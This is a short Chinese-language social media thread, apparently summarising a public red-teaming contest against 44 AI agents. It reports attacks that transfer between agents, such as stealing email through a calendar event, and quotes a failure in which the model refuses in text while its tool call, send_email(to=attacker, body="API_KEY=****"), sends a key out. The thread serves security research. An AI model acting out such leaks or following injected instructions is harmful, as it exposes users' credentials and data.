我們部署了44個AI代理,並提供了17萬美元的獎金給互聯網來攻擊它們。 180萬次嘗試,62,000次違規,包括數據洩露和財務損失。 🚨 令人擔憂的是,相同的漏洞會轉移到實時生產代理上……(例如:通過日曆事件竊取電子郵件)🧵
許多漏洞是普遍且可轉移的。 複製‑粘貼的模式在任務、模型和防護措施之間都能運作。如果今天它使一個代理失效,那麼它很可能也會使你的失效。
最喜歡的失敗: “在文本中拒絕,在工具中行動。” 😈 模型: “我無法分享憑證。” 然後: send_email(to=attacker, body="API_KEY=****") 用戶界面看起來安全;工具層造成了損害。
466.59K